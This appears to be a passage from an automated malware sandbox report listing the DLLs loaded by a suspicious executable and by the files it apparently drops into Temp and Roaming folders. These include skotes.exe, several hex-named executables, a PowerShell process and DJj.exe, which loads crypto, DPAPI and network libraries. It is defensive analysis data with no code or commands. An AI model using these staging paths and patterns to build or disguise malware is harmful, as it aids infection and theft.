                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exeSection loaded: windowscodecs.dll
